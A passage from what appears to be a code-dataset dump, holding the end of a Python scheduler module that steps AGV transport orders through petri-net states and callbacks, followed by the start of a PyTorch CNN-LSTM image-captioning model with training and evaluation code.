for u, v in graph.in_edges(task.name):\n # ignore self loops\n if u != v:\n incoming_edges = incoming_edges + 1\n else:\n self.not_done_parents[task.name] = 1\n self.not_done_parents[task.name] = self.not_done_parents[task.name] + incoming_edges\n self.parent_count[task.name] = self.not_done_parents[task.name]\n if incoming_edges == 0:\n startable_tasks.append(task)\n\n return startable_tasks\n\n def fire_event(self, uuid_, event):\n \"\"\" Fires event to petri net corresponding to task of uuid \"\"\"\n task = self.tasks[str(uuid_)]\n 
self.petri_net_logic.fire_event(task, event, self.on_petri_net_response)\n\n def initialize_tasks(self, tasks):\n \"\"\" Adds information for api classes to tasks and init dicts \"\"\"\n for i, task in enumerate(tasks):\n if self.test_flag:\n uuid_ = i\n else:\n uuid_ = uuid.uuid4()\n self.tasks[str(uuid_)] = task\n self.ids[task.name] = uuid_\n self.tasks_done[task.name] = False\n self.not_done_parents[task.name] = 0\n\n transport_order = task.transport_order\n transport_order.uuid = uuid_\n pickup_tos = transport_order.pickup_tos\n delivery_tos = transport_order.delivery_tos\n\n for instance in self.lotlan_structure.instances.values():\n if instance.template_name == \"Location\":\n if pickup_tos.location.logical_name == instance.name:\n pickup_tos.location.physical_name = instance.keyval[\"name\"]\n pickup_tos.location.location_type = instance.keyval[\"type\"]\n elif delivery_tos.location.logical_name == instance.name:\n delivery_tos.location.physical_name = instance.keyval[\"name\"]\n delivery_tos.location.location_type = instance.keyval[\"type\"]\n\n def create_event_information_list(self):\n \"\"\" Creates a list of events objects out of the event names \"\"\"\n for task in self.tasks_in_mf:\n triggered_by = []\n for event_name in task.triggered_by_events:\n logical_name = self.event_instances[event_name].name\n physical_name = self.event_instances[event_name].keyval[\"name\"]\n event_type = self.event_instances[event_name].keyval[\"type\"]\n triggered_by.append(Event(logical_name, physical_name, event_type, None, None))\n self.triggered_by_events[task.name] = triggered_by\n\n finished_by = []\n for event_name in task.finished_by_events:\n logical_name = self.event_instances[event_name].name\n physical_name = self.event_instances[event_name].keyval[\"name\"]\n event_type = self.event_instances[event_name].keyval[\"type\"]\n finished_by.append(Event(logical_name, physical_name, event_type, None, None))\n self.finished_by_events[task.name] = finished_by\n\n def on_petri_net_response(self, msg, task):\n \"\"\"\n Handles incoming messages from the petri net logic and\n calls corresponding methods\n \"\"\"\n if msg == LogicConstants.TRIGGERED_BY_PASSED_MSG:\n self.next_to([task])\n elif msg == LogicConstants.TOS_TB_PASSED_MSG:\n self.on_tos_tb_passed(task)\n elif msg == LogicConstants.TOS_WAIT_FOR_ACTION:\n self.on_tos_wait_for_action(task)\n elif msg == LogicConstants.TOS_FINISHED_MSG:\n self.on_tos_finished(task)\n elif msg == LogicConstants.TO_DONE_MSG:\n self.on_to_done(task)\n elif msg == LogicConstants.TASK_FINISHED_MSG:\n self.on_task_finished(task)\n\n def next_to(self, task_info):\n \"\"\" Notifies listeners about the next transport orders and set petri net state \"\"\"\n if task_info:\n transport_orders = {}\n for task in task_info:\n uid = self.ids[task.name]\n\n transport_order = task.transport_order\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_STARTED\n transport_orders[uid] = transport_order\n\n to_done_event = Event(\"to_done\", \"\", \"Boolean\",\n comparator=\"\", value=True)\n\n self.petri_net_logic.set_awaited_events(task, [to_done_event])\n\n self.start_tos(task, transport_order.pickup_tos)\n\n for callback in self.materialflow_callbacks.next_to_cb:\n callback(self._uuid, transport_orders)\n\n def start_tos(self, task, tos, pickup=True):\n \"\"\" Starts scheduling of the given TransportOrderStep \"\"\"\n if tos.triggered_by:\n self.petri_net_logic.set_awaited_events(task, tos.triggered_by)\n\n if pickup:\n task.transport_order.state = 
TransportOrder.TransportOrderState.PICKUP_WAIT_FOR_TRIGGERED_BY\n else:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_WAIT_FOR_TRIGGERED_BY\n \n uid = self.ids[task.name]\n self.log_transport_order(uid, task.transport_order)\n else:\n tos_started_event = Event(PetriNetConstants.TOS_STARTED_PLACE, \"\", \"Boolean\", value=True)\n tos_done_event = Event(PetriNetConstants.TOS_MOVED_TO_LOCATION_PLACE, \"\", \"Boolean\", True)\n self.petri_net_logic.set_awaited_events(task, [tos_started_event, tos_done_event])\n self.petri_net_logic.fire_event(task, tos_started_event)\n\n def on_tos_tb_passed(self, task):\n \"\"\"\n Gets called when a TriggeredBy is passed in a TransportOrderStep net.\n Set the petr net state and set new awaited event \"moved_to_location\" for\n either the Pickup Net or the Delivery net depending on the current state\n \"\"\"\n current_state = task.transport_order.state\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.PICKUP_WAIT_FOR_TRIGGERED_BY:\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_STARTED\n elif current_state == TransportOrder.TransportOrderState.DELIVERY_WAIT_FOR_TRIGGERED_BY:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_STARTED\n\n self.log_transport_order(uid, transport_order)\n\n moved_to_locaction_event = Event(\"moved_to_location\", \"\", \"Boolean\", value=True)\n self.petri_net_logic.set_awaited_events(task, [moved_to_locaction_event])\n\n def on_tos_wait_for_action(self, task):\n \"\"\" \n Gets called when the AGV has moved to the Location.\n Set the petri net state and set FinishedBy events as awaited events.\n \"\"\"\n current_state = task.transport_order.state\n tos = None\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.PICKUP_STARTED:\n task.transport_order.state = TransportOrder.TransportOrderState.WAIT_FOR_LOADING\n tos = task.transport_order.pickup_tos\n elif current_state == TransportOrder.TransportOrderState.DELIVERY_STARTED:\n task.transport_order.state = TransportOrder.TransportOrderState.WAIT_FOR_UNLOADING\n tos = task.transport_order.delivery_tos\n else:\n print(\"Something went wrong!\")\n\n self.log_transport_order(uid, transport_order)\n\n self.petri_net_logic.set_awaited_events(task, tos.finished_by)\n\n def on_tos_finished(self, task):\n \"\"\"\n Gets called when a TransportOrderStep is done.\n Set the petri net state and either call on_pickup_finished method\n or on_delivery_finished method depending on the current state\n \"\"\"\n current_state = task.transport_order.state\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.WAIT_FOR_LOADING:\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_FINISHED\n self.log_transport_order(uid, transport_order)\n self.on_pickup_finished(task)\n elif current_state == TransportOrder.TransportOrderState.WAIT_FOR_UNLOADING:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_FINISHED\n self.log_transport_order(uid, transport_order)\n self.on_delivery_finished(task)\n else:\n print(\"Something went wrong!\")\n\n def on_pickup_finished(self, task):\n \"\"\"\n Gets called when the Pickup TransportOrderStep 
is finished.\n Set petri net state and start Delivery TransportOrderStep\n \"\"\"\n self.pickup_finished(self.ids[task.name])\n\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_STARTED\n self.start_tos(task, task.transport_order.delivery_tos, False)\n\n def on_delivery_finished(self, task):\n \"\"\"\n Gets called when the Delivery TransportOrderStep is finished.\n Set petri net state and fire the to_done event to the task net\n \"\"\"\n self.delivery_finished(self.ids[task.name])\n\n to_done_event = Event(\"to_done\", \"\", \"Boolean\", value=True) \n self.petri_net_logic.set_awaited_events(task, [to_done_event])\n self.petri_net_logic.fire_event(task, to_done_event, self.on_petri_net_response)\n\n def on_to_done(self, task_info):\n \"\"\"\n Gets called when transport order is done by the AGV.\n Set petri net state (wait for possible FinishedBy events)\n \"\"\"\n uid = self.ids[task_info.name]\n if self.finished_by_events[task_info.name]:\n transport_order = task_info.transport_order\n transport_order.state = TransportOrder.TransportOrderState.TASK_WAIT_FOR_FINISHED_BY\n self.log_transport_order(uid, transport_order)\n\n finished_by_events = self.finished_by_events[task_info.name]\n self.petri_net_logic.set_awaited_events(task_info, finished_by_events)\n self.wait_for_finished_by(uid, self.finished_by_events[task_info.name])\n\n def on_task_finished(self, task_info):\n \"\"\"\n Gets called when task is finished.\n Starts possible onDone tasks and set petri net state\n \"\"\"\n uid = self.ids[task_info.name]\n self.task_finished(uid)\n self.tasks_done[task_info.name] = True\n\n self.petri_net_logic.set_awaited_events(task_info, [None])\n task_info.transport_order.state = TransportOrder.TransportOrderState.FINISHED\n self.log_transport_order(uid, task_info.transport_order)\n\n if task_info.on_done:\n startable_tasks = []\n for task in task_info.on_done:\n self.not_done_parents[task] = self.not_done_parents[task] - 1\n\n # all parent tasks are done start the task\n if self.not_done_parents[task] == 0:\n task_key = self.tasks[str(self.ids[task])]\n startable_tasks.append(task_key)\n self.not_done_parents[task_key.name] = self.parent_count[task_key.name]\n\n self.start_tasks(startable_tasks)\n elif self.all_tasks_done():\n self._is_running = False\n self.all_finished()\n\n def all_tasks_done(self):\n \"\"\"\n Returns true if all tasks are done\n \"\"\"\n if self.cycle_in_call_graph is False:\n for task_done in self.tasks_done.values():\n if task_done is False:\n return False\n return True\n return False\n\n def log_transport_order(self, to_uuid, transport_order):\n \"\"\"\n Saves the given TransportOrder with its locations in the db \n by calling insert method of the logger\n \"\"\"\n pickup_location = transport_order.pickup_tos.location\n delivery_location = transport_order.delivery_tos.location\n self.logger.insert_transport_order(self._uuid, to_uuid, transport_order.state,\n pickup_location, delivery_location)\n\n def wait_for_triggered_by(self, uuid_, event_information):\n for callback in self.materialflow_callbacks.triggered_by_cb:\n callback(self._uuid, uuid_, event_information)\n\n def wait_for_finished_by(self, uuid_, event_information):\n for callback in self.materialflow_callbacks.finished_by_cb:\n callback(self._uuid, uuid_, event_information)\n\n def task_finished(self, uuid_):\n for callback in self.materialflow_callbacks.task_finished_cb:\n callback(self._uuid, uuid_)\n\n def all_finished(self):\n for callback in 
self.materialflow_callbacks.all_finished_cb:\n callback(self._uuid)\n\n def pickup_finished(self, uuid_):\n for callback in self.materialflow_callbacks.pickup_finished_cb:\n callback(self._uuid, uuid_)\n\n def delivery_finished(self, uuid_):\n for callback in self.materialflow_callbacks.delivery_finished_cb:\n callback(self._uuid, uuid_)\n\n def register_callback_triggered_by(self, callback):\n \"\"\"\n If a Task can be started and has a TriggeredBy defined, all\n registered callback functions will be called\n \"\"\"\n if callback not in self.materialflow_callbacks.triggered_by_cb:\n self.materialflow_callbacks.triggered_by_cb.append(callback)\n\n def register_callback_next_to(self, callback):\n \"\"\"\n If a Task was started and the TriggeredBy condition is satisfied or there is\n no TriggeredBy all callback functions registered here will be called\n \"\"\"\n if callback not in self.materialflow_callbacks.next_to_cb:\n self.materialflow_callbacks.next_to_cb.append(callback)\n\n def register_callback_finished_by(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the TransportOrder is done\n which means a \"to_done\" event was sent and a FinishedBy was defined\n \"\"\"\n if callback not in self.materialflow_callbacks.finished_by_cb:\n self.materialflow_callbacks.finished_by_cb.append(callback)\n\n def register_callback_task_finished(self, callback):\n \"\"\"\n If a Task is finished functions registered here are being called.\n \"\"\"\n if callback not in self.materialflow_callbacks.task_finished_cb:\n self.materialflow_callbacks.task_finished_cb.append(callback)\n\n def register_callback_all_finished(self, callback):\n \"\"\"\n If all Tasks in a Materialflow are finished functions registered here are being called\n \"\"\"\n if callback not in self.materialflow_callbacks.all_finished_cb:\n self.materialflow_callbacks.all_finished_cb.append(callback)\n\n def register_callback_pickup_finished(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the Pickup TransportOrderStep\n of a task is finished\n \"\"\"\n if callback not in self.materialflow_callbacks.pickup_finished_cb:\n self.materialflow_callbacks.pickup_finished_cb.append(callback)\n\n def register_callback_delivery_finished(self, callback):\n \"\"\"\n Functions passed in to this method will be called when the Delivery TransportOrderStep\n of a task is finished\n \"\"\"\n if callback not in self.materialflow_callbacks.delivery_finished_cb:\n self.materialflow_callbacks.delivery_finished_cb.append(callback)\n","repo_name":"iml130/lotlan-scheduler","sub_path":"lotlan_scheduler/api/materialflow.py","file_name":"materialflow.py","file_ext":"py","file_size_in_byte":21868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41527713686","text":"import torch\nimport torch.nn as nn\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\nimport torch.nn.functional as F\nfrom typing import Tuple,List\nfrom .Dataset import MyDataset\nfrom .Vocabulary import Vocabulary\nfrom .Decoder.IDecoder import IDecoder\nfrom .Encoder.IEncoder import IEncoder\nfrom .Attention.IAttention import IAttention\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.utils import save_image\nimport matplotlib.pyplot as plt\nfrom VARIABLE import MAX_CAPTION_LENGTH\nfrom .Metrics import Result\n\nclass CaRNet(nn.Module):\n \"\"\"\n The ConvolutionalandRecurrentNet (CaRNet).\n 
CaRNet works with a Residual NeuralNet with 50layers (ResNet50) with the last layer removed.\n In CaRNet it supports 3 types of LSTM:\n - vI: the features extracted from the image are provided as input with <START> token\n - vH: the features extracted from the image becames the hidden state at t_0\n - vHC: the features extracted from the image becames both the hidden and cell state at t_0\n \n When it is flavoured with Attention, it becames a ConvolutionalAttentionRecurrentNet (CARNet).\n CARNet works with a Residual NeuralNet with 50layers (ResNet50) with the last convolutional layer exposed.\n For now support only 1 type of LSTM:\n - vHC\n \"\"\"\n \n def __init__(self, encoder: IEncoder, decoder: IDecoder, net_name: str, encoder_dim: int, hidden_dim: int, padding_index: int, vocab_size: int, embedding_dim: int, attention: IAttention = None, attention_dim: int = 1024, device: str = \"cpu\"):\n \"\"\"Create the C[aA]RNet \n\n Args:\n encoder (IEncoder): \n The encoder to use.\n \n decoder (IDecoder): \n The decoder to use.\n \n net_name (str): \n Name of the Neural Network.\n \n encoder_dim (int): \n The dimensionality of the features vector extracted from the image.\n \n hidden_dim (int): \n The Capacity of the LSTM Cell.\n \n padding_index (int): \n The index of the padding id, given from the vocabulary associated to the dataset.\n \n vocab_size (int)): \n The size of the vocabulary associated to the dataset.\n \n embedding_dim (int): \n Size associated to the input of the LSTM cell.\n \n attention (IAttention, optional): (Default is None)\n The attention if Provided.\n \n attention_dim (int, optional): (Default is 1024)\n Size of the attention layer, used only if attention is not None.\n \n device (str, optional): \n The device on which the net does the computation. Defaults to \"cpu\".\n \"\"\"\n\n super(CaRNet, self).__init__()\n self.padding_index = padding_index\n self.device = torch.device(device)\n self.name_net = net_name\n self.result_storer = Result()\n # Define Encoder and Decoder\n self.C = encoder(encoder_dim = encoder_dim, device = device)\n self.R = None\n \n # Take the attention in consideration\n self.attention = False\n \n if attention is not None: # I know..some skilled dev. will hate me for this if-else statement. Forgive ME.\n self.attention = True\n self.R = decoder(hidden_dim, padding_index, vocab_size, embedding_dim, device, attention(self.C.encoder_dim, hidden_dim, attention_dim))\n else:\n self.R = decoder(hidden_dim, padding_index, vocab_size, embedding_dim, device)\n\n # Check if the Recurrent net was initialized oth. we are in error state.\n if self.R is None:\n raise ValueError(\"Could not create the Recurrent network.\")\n \n # Send both net to the defined device -> cpu or gpu \n self.C.to(self.device)\n self.R.to(self.device)\n \n def switch_mode(self, mode: str) -> bool: \n \"\"\" Change the working modality of the net among \"training\" or \"evaluation\".\n\n Args:\n mode (str): \n New mode of work, \"training\" | \"evaluation\"\n\n Returns:\n bool: \n If True the state is correctly changed, oth. not.\n \"\"\"\n # Q. Why no control if they already stay in the wanted state?\n # A. Increase the condition may lead to more than expected case to control. 
Avoid IfElse community addicted :) \n if mode == \"training\":\n self.C.train() # switch to training state\n self.R.train()\n return True\n \n if mode == \"evaluation\":\n self.C.eval() # switch to evaluation state\n self.R.eval()\n return True\n return False\n \n def save(self, file_path: str) -> bool:\n \"\"\"Save the net in non-volatile memory\n\n Args:\n file_name (str): Relative path to save the net. Ex. \"home/pippo/saved\"\n\n Returns:\n bool: If True: Net saved correctly. False otherwise.\n \"\"\"\n try:\n # Name_type_encoderdim_embeddingdim_hiddendim_attentiondim\n torch.save(self.C.state_dict(), f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_C.pth\")\n torch.save(self.R.state_dict(), f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_R.pth\")\n except Exception as ex:\n print(ex)\n return False\n return True\n\n def load(self, file_path: str) -> bool:\n \"\"\"Load the net from non-volatile memory into RAM\n\n Args:\n file_name (str): Relative path of the net. Ex. \"home/pippo/saved\"\n\n Returns:\n bool: If True: Net loaded correctly. False otherwise.\n \"\"\"\n \n # since our classifier is a nn.Module, we can load it using pytorch facilities (mapping it to the right device)\n self.C.load_state_dict(torch.load(f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_C.pth\", map_location=self.device))\n self.R.load_state_dict(torch.load(f\"{file_path}/{self.name_net}_{self.C.encoder_dim}_{self.R.hidden_dim}_{self.R.attention.attention_dim if self.attention == True else 0}_R.pth\", map_location=self.device))\n \n def forward(self, images: torch.tensor, captions: torch.tensor) -> torch.tensor:\n \"\"\"Provide images to the net for retrieve captions\n\n Args:\n images (torch.tensor): `(Batch Size, Channels, Width, Height)`\n The images of the batch.\n \n captions (torch.tensor): `(Batch Size, Max_Captions_Length)`. 
\n ASSUMPION: The captions are padded with <PAD> Token\n\n Returns:\n (torch.tensor): `(batch_size, max_captions_length, vocab_size)`\n The output of each time step from t_1 to t_N.\n REMARK <START> token is provided as output at t_0\n \"\"\"\n features = self.C(images)\n return self.R(features, captions)\n\n def __accuracy(self, outputs: torch.tensor, labels: torch.tensor, captions_length: List[int]) -> float:\n \"\"\"Evaluate the accuracy of the Net with Jaccard Similarity.\n Assumption: outputs and labels have same shape and already padded.\n\n Args:\n outputs (torch.tensor): `(batch_dim, MAX_CAPTION_LENGTH)`\n The captions generated from the net.\n labels (torch.tensor): `(batch_dim, MAX_CAPTION_LENGTH)` \n The Real captions.\n captions_length (list): \n\n Returns:\n float: The accuracy of the Net\n \"\"\"\n \n\n # computing the accuracy with Jaccard Similarity, pytorch unique facility has bugs with cuda....it can be done \"a manella\" :)\n # from python 3.9 you could use the package torchmetrics\n # from torchmetrics import JaccardIndex\n # intersection_over_union = JaccardIndex(num_classes=self.R.vocab_size).cuda() if self.device.type != \"cpu\" else JaccardIndex(num_classes=self.R.vocab_size)\n # return intersection_over_union(outputs, labels)\n outputs = np.array(list(map(lambda output: np.unique(output), outputs.cpu())), dtype=object) # Remove duplicate from each caption\n labels = np.array(list(map(lambda label: np.unique(label), labels.cpu())), dtype=object) # Remove duplicate from each caption\n \n unions = list(map(lambda index: len(np.union1d(outputs[index],labels[index])), range(labels.shape[0])))\n intersections = list(map(lambda index: len(np.intersect1d(outputs[index],labels[index])), range(labels.shape[0])))\n return torch.mean(torch.tensor(intersections).type(torch.float)/torch.tensor(unions).type(torch.float), axis=0)\n \n \n def train(self, train_set: MyDataset, validation_set: MyDataset, lr: float, epochs: int, vocabulary: Vocabulary):\n \"\"\"Train the net\n\n Args:\n train_set (MyDataset): \n The associate training set.\n \n validation_set (MyDataset): \n The associate validation set.\n \n lr (float): \n The learning rate.\n \n epochs (int): \n The number of epochs.\n \n vocabulary (Vocabulary): \n The vocabulary associate to the Dataset\n \"\"\"\n \n # Initialize Loss: CrossEntropyLoss -> Softmax + NegativeLogLikelihoodLoss \n # Q. Why ignore_index is setted to <START> instead of <PAD>?\n # A. In the training, both output of the CaRNet and Target is a padded tensor, but when we compute the loss it will evaluate the tensor with pack_padded_sequence.\n # And since <START> token is hardcoded as output at t_0 and it is contained into the Target we could avoid the computation of loss on it, since will be 0. \n \n criterion = nn.CrossEntropyLoss(ignore_index=vocabulary.predefined_token_idx()[\"<START>\"],reduction=\"sum\").cuda() if self.device.type == \"cuda\" \\\n else nn.CrossEntropyLoss(ignore_index=vocabulary.predefined_token_idx()[\"<START>\"],reduction=\"sum\")\n \n # initializing some elements\n best_val_acc = -1. 
# the best accuracy computed on the validation data\n best_epoch = -1 # the epoch in which the best accuracy above was computed\n \n # ensuring the classifier is in 'train' mode (pytorch)\n self.switch_mode(\"training\")\n\n # creating the optimizer\n optimizer = torch.optim.Adam(list(self.R.parameters()) + list(self.C.parameters()), lr)\n\n # loop on epochs\n for e in range(0, epochs):\n\n # epoch stats (computed by accumulating mini-batch stats)\n epoch_train_acc = 0.\n epoch_train_loss = 0.\n epoch_num_train_examples = 0\n batch_id_reporter = 0\n for images,captions_ids,captions_length in train_set:\n optimizer.zero_grad() \n \n batch_num_train_examples = images.shape[0] # mini-batch size (it might be different from 'batch_size') -> last batch truncated\n epoch_num_train_examples += batch_num_train_examples\n \n # Send data to the appropriate device\n images = images.to(self.device)\n captions_ids = captions_ids.to(self.device)\n captions_length = captions_length.to(self.device)\n \n # computing the network output on the current mini-batch\n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim) \n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim)\n # Retrieve Features for each image\n features = self.C(images)\n \n # Check if attention is provided, if yes the output will change accordly for fitting doubly stochastic gradient\n if self.attention == False: # I know..some skilled dev. will hate me for this if-else statement. Forgive ME.\n outputs, _ = self.R(features, captions_ids, captions_length) # outputs > (B, L, |V|); \n else:\n outputs, _, alphas = self.R(features, captions_ids, captions_length)\n \n outputs = pack_padded_sequence(outputs, captions_length.cpu(), batch_first=True) #(Batch, MaxCaptionLength, |Vocabulary|) -> (Batch * CaptionLength, |Vocabulary|)\n \n targets = pack_padded_sequence(captions_ids, captions_length.cpu(), batch_first=True) #(Batch, MaxCaptionLength) -> (Batch * CaptionLength)\n \n loss = criterion(outputs.data, targets.data)\n \n # Doubly stochastic gradient if attention is ON\n if self.attention == True:\n loss += float(torch.sum((\n 0.5 * torch.sum((\n (1 - torch.sum(alphas, dim=1,keepdim=True)) ** 2 # caption_length sum\n ), dim=2, keepdim=True) # alpha_dim sum\n ), dim=0).squeeze(1)) # batch_dim sum\n \n # computing gradients and updating the network weights\n loss.backward() # computing gradients\n optimizer.step() # updating weights\n\n # Training set accuracy evaluation\n with torch.no_grad():\n self.switch_mode(\"evaluation\")\n \n # computing the network output on the current mini-batch\n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim) \n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim)\n # Retrieve Features for each image\n projections = self.C(images)\n \n # Create a padded tensor manually\n captions_output = torch.zeros((projections.shape[0],captions_ids.shape[1])).to(self.device)\n \n for idx, _ in enumerate(range(projections.shape[0])):\n # OUT: (1, CAPTION_LENGTH)\n if self.attention == True:\n _caption_no_pad, _ = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, H_portions, W_portions, encoder_dim), 1)\n else:\n _caption_no_pad = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, encoder_dim), 1)\n # Add for each batch element the caption. 
The surplus element are already feeded with zeros\n captions_output[idx,:_caption_no_pad.shape[1]] = _caption_no_pad\n \n\n captions_output_padded = captions_output.type(torch.int32).to(self.device) # Out: (batch_dim, MAX_CAPTION_LENGTH)\n \n # computing performance\n batch_train_acc = self.__accuracy(captions_output_padded.squeeze(1), captions_ids, captions_length)\n\n # accumulating performance measures to get a final estimate on the whole training set\n epoch_train_acc += batch_train_acc * batch_num_train_examples\n\n # accumulating other stats\n epoch_train_loss += loss.item() * batch_num_train_examples\n \n self.switch_mode(\"training\")\n \n # printing (mini-batch related) stats on screen\n print(f\" mini-batch:\\tloss={loss.item():.4f}, tr_acc={batch_train_acc:.5f}\")\n \n # Store result of this batch in a dataframe\n self.result_storer.add_train_info(epoch=int(e), batch_id=int(batch_id_reporter),loss=float(loss.item()),accuracy=float(batch_train_acc) )\n batch_id_reporter += 1\n # Evaluate the accuracy of the validation set\n val_acc = self.eval_net(validation_set,vocabulary)\n\n # # saving the model if the validation accuracy increases\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_epoch = e + 1 \n self.save(\"./.saved\")\n \n epoch_train_loss /= epoch_num_train_examples\n # Store the result of the validation set in this epoch\n self.result_storer.add_validation_info(epoch=int(e), accuracy=float(val_acc))\n # printing (epoch related) stats on screen\n print(f\"epoch={e + 1}/{epochs}:\\tloss={epoch_train_loss:.4f}, tr_acc={epoch_train_acc / epoch_num_train_examples:.5f}, val_acc={val_acc:.5f}, {'BEST!' if best_epoch == e+1 else ''}\")\n # store data in files\n self.result_storer.flush()\n \n def eval_net(self, data_set, vocabulary):\n \"\"\" Evaluate a data set\n\n Args:\n data_set (MyDataset): \n The associate data set.\n \n vocabulary (Vocabulary): \n The vocabulary associate to the Dataset\n\n Returns:\n (int):\n Accuracy on given dataset\n \"\"\"\n \n self.switch_mode(\"evaluation\") # enforcing evaluation mode\n with torch.no_grad(): # keeping off the autograd engine\n _images = None\n # loop on mini-batches to accumulate the network outputs (creating a new iterator)\n for images,captions_ids,captions_length in data_set:\n images = images.to(self.device)\n \n captions_ids = captions_ids.to(self.device)\n \n # If Attention is on:\n # In: (batch_dim, channels, height, width) Out: (batch_dim,H_portions, W_portions, encoder_dim)\n # Else:\n # In: (batch_dim, channels, height, width) Out: (batch_dim, encoder_dim) \n # Retrieve Features for each image\n projections = self.C(images) \n \n # Create a padded tensor manually\n captions_output = torch.zeros((projections.shape[0],captions_ids.shape[1])).to(self.device)\n \n for idx, _ in enumerate(range(projections.shape[0])):\n # OUT: (1, CAPTION_LENGTH)\n if self.attention == True:\n _caption_no_pad, _ = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, H_portions, W_portions, encoder_dim), 1)\n else:\n _caption_no_pad = self.R.generate_caption(projections[idx].unsqueeze(0),captions_ids.shape[1]) # IN: ((1, encoder_dim), 1)\n # Add for each batch element the caption. 
The surplus element are already feeded with zeros\n captions_output[idx,:_caption_no_pad.shape[1]] = _caption_no_pad\n \n # Pick the 1st image of the last batch for printing out the result \n _image = images[0]\n captions_output_padded = captions_output.type(torch.int32).to(self.device) # Out: (batch_dim, MAX_CAPTION_LENGTH)\n \n # computing performance\n acc = self.__accuracy(captions_output_padded.squeeze(1), captions_ids, captions_length)\n \n self.eval(_image,vocabulary)\n self.switch_mode(\"training\")\n \n return acc\n \n def __generate_image_caption(self, image: torch.Tensor, vocabulary: Vocabulary, image_name: str = \"caption.png\"):\n \"\"\" Genareate an image with caption.\n\n Args:\n image (torch.Tensor): `(channels, height, width)`\n The tensorial representation of the image in resnet50 form.\n \n vocabulary (Vocabulary): \n The vocabulary associated to the dataset.\n \n image_name (str, optional): Defaults to \"caption.png\".\n The image of the generated file\n \"\"\"\n self.switch_mode(\"evaluation\") # enforcing evaluation mode\n \n # If Attention is on:\n # Out: 1st step (batch_dim,H_portions, W_portions, encoder_dim) -> 2nd step (batch_dim, H_portions * W_portions, encoder_dim) \n # Else:\n # Out: (1, encoder_dim) \n features = self.C(image.unsqueeze(0))\n \n if self.attention == True:\n caption, alphas = self.R.generate_caption(features,MAX_CAPTION_LENGTH)\n else:\n caption = self.R.generate_caption(features,MAX_CAPTION_LENGTH)\n \n # Generate image caption\n caption = vocabulary.rev_translate(caption[0])\n \n # Adjust the color of the image wrt the transform operation of the resnet50\n image[0] = image[0] * 0.229\n image[1] = image[1] * 0.224 \n image[2] = image[2] * 0.225 \n image[0] += 0.485 \n image[1] += 0.456 \n image[2] += 0.406\n \n # Swap color channels\n image = image.permute((1,2,0)) # IN: (height, width, channels)\n \n # If attention is ON perform the evaluation of attention over the immage\n if self.attention == True:\n self.__generate_image_attention(image, caption, alphas)\n\n plt.figure(figsize=(15, 15))\n plt.imshow(image.cpu())\n plt.title(caption)\n plt.savefig(\"caption.png\")\n plt.close()\n \n self.switch_mode(\"training\")\n \n def __generate_image_attention(self, image: torch.tensor, caption, alphas, image_name: str = \"attention.png\"):\n \"\"\"Perform the evaluation of the attention over the image.\n\n Args:\n image (torch.Tensor): \n The tensorial representation of the image.\n \n caption (list(str)): \n The caption.\n \n alphas (torch.Tensor): \n \n image_name (str, optional): Defaults to \"attention.png\".\n The image of the generated file\n \"\"\"\n self.switch_mode(\"evaluation\") \n \n fig = plt.figure(figsize=(15, 15))\n _caption_len = len(caption)\n for t in range(_caption_len):\n # from 49 element to 7x7\n _att = alphas[t].reshape(self.R.attention.number_of_splits,self.R.attention.number_of_splits)\n \n # Add a subplot accordly to the word in caption position\n ax = fig.add_subplot(_caption_len//2, _caption_len//2, t+1)\n \n ax.set_title(f\"{caption[t]}\", fontsize=12)\n \n img = ax.imshow(image.cpu())\n \n # Add attention layer\n ax.imshow(_att, cmap='gray', alpha=0.7, extent=img.get_extent())\n plt.tight_layout()\n plt.savefig(image_name)\n plt.close()\n \n self.switch_mode(\"training\")\n \n # Inspiration is taken from this example https://www.kaggle.com/mdteach/image-captioning-with-attention-pytorch\n # Thanks ABISHEK BASHYAL :)\n def eval(self, image: object, vocabulary: Vocabulary):\n \"\"\"Evaluate an image and retrieve the 
